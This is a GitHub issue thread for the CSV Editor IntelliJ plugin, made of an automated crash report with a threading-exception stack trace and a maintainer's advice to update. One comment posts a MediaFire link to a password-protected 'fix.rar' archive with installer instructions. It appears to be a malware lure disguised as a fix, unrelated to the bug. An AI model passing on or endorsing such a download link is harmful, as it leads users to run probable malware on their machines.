### ISSUE TITLE
[Automated Report] com.intellij.openapi.diagnostic.RuntimeExceptionWithAttachments: Read access is allowed from inside read-action only (see Application.runReadAction()); see https://jb.gg/ij-platform-threading for details

### ISSUE THREAD

**Issue by lfrid-lab** [SeeSharpSoft/intellij-csv-validator#866]
Message
---
<no message>

Stacktrace
---
com.intellij.openapi.diagnostic.RuntimeExceptionWithAttachments: Read access is allowed from inside read-action only (see Application.runReadAction()); see https://jb.gg/ij-platform-threading for details
Current thread: Thread[#41,AWT-EventQueue-0,6,main] 363430444 (EventQueue.isDispatchThread()=true)
SystemEventQueueThread: (same)
	at com.intellij.util.concurrency.ThreadingAssertions.createThreadAccessException(ThreadingAssertions.java:177)
	at com.intellij.util.concurrency.ThreadingAssertions.softAssertReadAccess(ThreadingAssertions.java:129)
	at com.intellij.openapi.application.impl.ApplicationImpl.assertReadAccessAllowed(ApplicationImpl.java:915)
	at com.intellij.psi.impl.source.PsiFileImpl.assertReadAccessAllowed(PsiFileImpl.java:185)
	at com.intellij.psi.impl.source.PsiFileImpl.loadTreeElement(PsiFileImpl.java:189)
	at com.intellij.psi.impl.source.PsiFileImpl.calcTreeElement(PsiFileImpl.java:812)
	at com.intellij.psi.impl.source.PsiFileImpl.getNode(PsiFileImpl.java:1011)
	at com.intellij.psi.impl.source.PsiFileImpl.getFirstChild(PsiFileImpl.java:822)
	at com.intellij.psi.PsiWalkingState$PsiTreeGuide.getFirstChild(PsiWalkingState.java:37)
	at com.intellij.psi.PsiWalkingState$PsiTreeGuide.getFirstChild(PsiWalkingState.java:19)
	at com.intellij.util.WalkingState.next(WalkingState.java:70)
	at com.intellij.util.WalkingState.walkChildren(WalkingState.java:49)
	at com.intellij.util.WalkingState.elementStarted(WalkingState.java:40)
	at com.intellij.psi.PsiWalkingState.elementStarted(PsiWalkingState.java:67)
	at com.intellij.psi.PsiRecursiveElementWalkingVisitor.visitElement(PsiRecursiveElementWalkingVisitor.java:34)
	at com.intellij.psi.util.PsiTreeUtil$4.visitElement(PsiTreeUtil.java:940)
	at com.intellij.psi.PsiElementVisitor.visitFile(PsiElementVisitor.java:51)
	at com.intellij.psi.PsiRecursiveElementWalkingVisitor.visitFile(PsiRecursiveElementWalkingVisitor.java:56)
	at com.intellij.extapi.psi.PsiFileBase.accept(PsiFileBase.java:59)
	at com.intellij.psi.util.PsiTreeUtil.processElements(PsiTreeUtil.java:936)
	at com.intellij.psi.util.PsiTreeUtil.findChildOfType(PsiTreeUtil.java:233)
	at com.intellij.psi.util.PsiTreeUtil.findChildOfType(PsiTreeUtil.java:199)
	at net.seesharpsoft.intellij.plugins.csv.editor.table.CsvTableModelBase.resetPointer(CsvTableModelBase.java:95)
	at net.seesharpsoft.intellij.plugins.csv.editor.table.CsvTableModelBase.getFieldAt(CsvTableModelBase.java:114)
	at net.seesharpsoft.intellij.plugins.csv.editor.table.CsvTableModel.isCommentRow(CsvTableModel.java:57)
	at net.seesharpsoft.intellij.plugins.csv.editor.table.swing.CsvTable.isCommentRow(CsvTable.java:48)
	at net.seesharpsoft.intellij.plugins.csv.editor.table.swing.CsvTable.columnAtPoint(CsvTable.java:78)
	at com.intellij.ui.hover.TableHoverListener.lambda$mouseMoved$1(TableHoverListener.java:25)
	at com.intellij.ui.hover.TableHoverListener.update(TableHoverListener.java:41)
	at com.intellij.ui.hover.TableHoverListener.mouseMoved(TableHoverListener.java:25)
	at com.intellij.ui.hover.TableHoverListener.mouseEntered(TableHoverListener.java:20)
	at com.intellij.ide.HoverService$ComponentPoint.lambda$mouseEntered$0(HoverService.java:118)
	at com.intellij.ide.HoverService$ComponentPoint.notifySafely(HoverService.java:143)
	at com.intellij.ide.HoverService$ComponentPoint.mouseEntered(HoverService.java:118)
	at com.intellij.ide.HoverService.process(HoverService.java:64)
	at com.intellij.ide.HoverService.process(HoverService.java:26)
	at com.intellij.ide.IdeEventQueue.dispatchEvent(IdeEventQueue.kt:328)
	at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:207)
	at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:128)
	at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:117)
	at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:113)
	at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:105)
	at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:92)

Plugin
---
PluginClassLoader(plugin=PluginDescriptor(name=CSV Editor, id=net.seesharpsoft.intellij.plugins.csv, descriptorPath=plugin.xml, path=~/Library/Application Support/JetBrains/PyCharm2024.2/plugins/CSVEditor, version=3.4.0-242, package=null, isBundled=false), packagePrefix=null, state=active, parents=PluginDescriptor(name=GitHub, id=org.jetbrains.plugins.github, moduleName=intellij.vcs.github/tracker, descriptorPath=intellij.vcs.github.tracker.xml, path=/Applications/PyCharm.app/Contents/plugins/vcs-github, version=242.20224.428, package=org.jetbrains.plugins.github.tasks, isBundled=true), PluginDescriptor(name=GitHub, id=org.jetbrains.plugins.github, moduleName=intellij.vcs.github.ultimate/cron, descriptorPath=intellij.vcs.github.ultimate.cron.xml, path=/Applications/PyCharm.app/Contents/plugins/vcs-github, version=242.20224.428, package=com.intellij.vcs.github.ultimate.cron, isBundled=true), PluginDescriptor(name=GitHub, id=org.jetbrains.plugins.github, moduleName=intellij.vcs.github.ultimate/docker, descriptorPath=intellij.vcs.github.ultimate.docker.xml, path=/Applications/PyCharm.app/Contents/plugins/vcs-github, version=242.20224.428, package=com.intellij.vcs.github.ultimate.action.runs.docker, isBundled=true), PluginDescriptor(name=IDEA CORE, id=com.intellij, moduleName=intellij.platform.vcs.impl, descriptorPath=intellij.platform.vcs.impl.xml, path=/Applications/PyCharm.app/Contents/lib, version=242.20224.428, package=null, isBundled=true), PluginDescriptor(name=IDEA CORE, id=com.intellij, moduleName=intellij.platform.vcs.log.impl, descriptorPath=intellij.platform.vcs.log.impl.xml, path=/Applications/PyCharm.app/Contents/lib, version=242.20224.428, package=null, isBundled=true), PluginDescriptor(name=IDEA CORE, id=com.intellij, moduleName=intellij.platform.vcs.dvcs.impl, descriptorPath=intellij.platform.vcs.dvcs.impl.xml, path=/Applications/PyCharm.app/Contents/lib, version=242.20224.428, package=null, isBundled=true), PluginDescriptor(name=IDEA CORE, id=com.intellij, moduleName=intellij.platform.collaborationTools, descriptorPath=intellij.platform.collaborationTools.xml, path=/Applications/PyCharm.app/Contents/lib, version=242.20224.428, package=null, isBundled=true), PluginDescriptor(name=GitHub, id=org.jetbrains.plugins.github, descriptorPath=plugin.xml, path=/Applications/PyCharm.app/Contents/plugins/vcs-github, version=242.20224.428, package=com.intellij.vcs.github.ultimate, isBundled=true), )

IDE
---
PyCharm (PY-242.20224.428)

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by SeeSharpSoft** [comment]
Try updating to latest CSV Editor version 4.*
